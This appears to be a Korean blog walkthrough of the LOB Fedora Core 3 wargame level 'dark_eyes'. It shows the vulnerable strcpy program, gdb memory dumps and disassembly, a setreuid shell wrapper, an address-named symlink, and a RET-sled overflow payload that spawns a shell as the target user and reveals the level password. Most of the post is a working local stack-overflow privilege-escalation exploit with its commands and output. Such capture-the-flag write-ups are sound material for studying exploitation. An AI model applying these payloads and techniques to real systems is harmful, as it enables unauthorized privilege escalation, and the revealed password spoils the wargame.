[iron_golem@Fedora_1stFloor ~]$ cat dark_eyes.c
/*
The Lord of the BOF : The Fellowship of the BOF
- dark_eyes
- Local BOF on Fedora Core 3
- hint : RET sleding
*/
int main(int argc, char *argv[])
{
char buffer[256];
char saved_sfp[4];
if(argc < 2){
printf("argv error\n");
exit(0);
}
// save sfp
memcpy(saved_sfp, buffer+264, 4);
// overflow!!
strcpy(buffer, argv[1]);
// restore sfp
memcpy(buffer+264, saved_sfp, 4);
printf("%s\n", buffer);
}
소스를 보면, 이전문제에서 단순히 sfp변조를 막는 기법이 추가된 코드이다.
이는 febp를 막기위한 것으로써,
이를 보면 이전에 RET sleding을 그대로 사용하면 될꺼같다.
[iron_golem@Fedora_1stFloor ~]$ cp dark_eyes dark_eye1
[iron_golem@Fedora_1stFloor ~]$ gdb -q dark_eye1
(no debugging symbols found)...Using host libthread_db library "/lib/tls/libthread_db.so.1".
(gdb) b main
Breakpoint 1 at 0x8048411
(gdb) r
Starting program: /home/iron_golem/dark_eye1
(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x08048411 in main ()
(gdb) x/40x $ebp
0xfefaf2f8: 0xfefaf358 0x00730e33 0x00000001 0xfefaf384
0xfefaf308: 0xfefaf38c 0x0070eab6 0x0083eff4 0x00000000
0xfefaf318: 0xfefaf310 0xfefaf358 0xfefaf300 0x00730df5
0xfefaf328: 0x00000000 0x00000000 0x00000000 0x00718fb4
0xfefaf338: 0x00000001 0x08048360 0x00000000 0x0070e9f0
0xfefaf348: 0x0070f340 0x00718fb4 0x00000001 0x08048360
0xfefaf358: 0x00000000 0x08048381 0x08048408 0x00000001
0xfefaf368: 0xfefaf384 0x080484bc 0x08048510 0x0070f340
0xfefaf378: 0xfefaf37c 0x00715e31 0x00000001 0xfefd7bfe
0xfefaf388: 0x00000000 0xfefd7c19 0xfefd7c32 0xfefd7c3d
(gdb) x/x 0x83eff4
0x83eff4 <svcauthsw+712>: 0x0083ed3c
(gdb) quit
The program is running. Exit anyway? (y or n) y
[iron_golem@Fedora_1stFloor ~]$ cat > sh.c
#include <stdio.h>
#include <stdlib.h>
int main()
{
setreuid(geteuid(),geteuid());
setregid(getegid(),getegid());
system("/bin/sh");
}
[iron_golem@Fedora_1stFloor ~]$ gcc -o sh sh.c
[iron_golem@Fedora_1stFloor ~]$ ln -s sh `perl -e 'print "\x3c\xed\x83\x00"'`
[iron_golem@Fedora_1stFloor ~]$ export PATH=./:$PATH
[iron_golem@Fedora_1stFloor ~]$ gdb -q dark_eye1
(no debugging symbols found)...Using host libthread_db library "/lib/tls/libthread_db.so.1".
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x08048408 <main+0>: push ebp
0x08048409 <main+1>: mov ebp,esp
0x0804840b <main+3>: sub esp,0x118
0x08048411 <main+9>: and esp,0xfffffff0
0x08048414 <main+12>: mov eax,0x0
0x08048419 <main+17>: add eax,0xf
0x0804841c <main+20>: add eax,0xf
0x0804841f <main+23>: shr eax,0x4
0x08048422 <main+26>: shl eax,0x4
0x08048425 <main+29>: sub esp,eax
0x08048427 <main+31>: cmp DWORD PTR [ebp+8],0x1
0x0804842b <main+35>: jg 0x8048447 <main+63>
0x0804842d <main+37>: sub esp,0xc
0x08048430 <main+40>: push 0x804859c
0x08048435 <main+45>: call 0x8048320 <_init+56>
0x0804843a <main+50>: add esp,0x10
0x0804843d <main+53>: sub esp,0xc
0x08048440 <main+56>: push 0x0
0x08048442 <main+58>: call 0x8048340 <_init+88>
0x08048447 <main+63>: sub esp,0x4
0x0804844a <main+66>: push 0x4
0x0804844c <main+68>: lea eax,[ebp-264]
0x08048452 <main+74>: add eax,0x108
0x08048457 <main+79>: push eax
0x08048458 <main+80>: lea eax,[ebp-268]
0x0804845e <main+86>: push eax
0x0804845f <main+87>: call 0x8048330 <_init+72>
0x08048464 <main+92>: add esp,0x10
0x08048467 <main+95>: sub esp,0x8
0x0804846a <main+98>: mov eax,DWORD PTR [ebp+12]
0x0804846d <main+101>: add eax,0x4
0x08048470 <main+104>: push DWORD PTR [eax]
0x08048472 <main+106>: lea eax,[ebp-264]
---Type <return> to continue, or q <return> to quit---
0x08048478 <main+112>: push eax
0x08048479 <main+113>: call 0x8048350 <_init+104>
0x0804847e <main+118>: add esp,0x10
0x08048481 <main+121>: sub esp,0x4
0x08048484 <main+124>: push 0x4
0x08048486 <main+126>: lea eax,[ebp-268]
0x0804848c <main+132>: push eax
0x0804848d <main+133>: lea eax,[ebp-264]
0x08048493 <main+139>: add eax,0x108
0x08048498 <main+144>: push eax
0x08048499 <main+145>: call 0x8048330 <_init+72>
0x0804849e <main+150>: add esp,0x10
0x080484a1 <main+153>: sub esp,0x8
0x080484a4 <main+156>: lea eax,[ebp-264]
0x080484aa <main+162>: push eax
0x080484ab <main+163>: push 0x80485a8
0x080484b0 <main+168>: call 0x8048320 <_init+56>
0x080484b5 <main+173>: add esp,0x10
0x080484b8 <main+176>: leave
0x080484b9 <main+177>: ret //ret 주소 확인
0x080484ba <main+178>: nop
0x080484bb <main+179>: nop
End of assembler dump.
(gdb) quit
[iron_golem@Fedora_1stFloor ~]$ ./dark_eyes `perl -e 'print "a"x268,"\xb9\x84\x04\x08"x3,"\x90\x54\x7a\x00"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa(Jðþ¹¹¹Tz
sh-3.00$ id
uid=502(dark_eyes) gid=502(dark_eyes) groups=501(iron_golem) context=user_u:system_r:unconfined_t
sh-3.00$ my-pass
euid = 502
because of you
'wargame > LOB FC' 카테고리의 다른 글
LOB FC3 [dark_eyes -> hell_fire] 를 풀다가 생긴 의문점에 대한 분석 (0) | 2014.04.24 |
---|---|
LOB FC3 [dark_eyes -> hell_fire] (0) | 2014.04.24 |
LOB FC3 [gate -> iron_golem] 를 풀다가 생긴 의문점에 대한 분석 (4) | 2014.04.23 |
LOB FC3 [gate -> iron_golem] (0) | 2014.04.22 |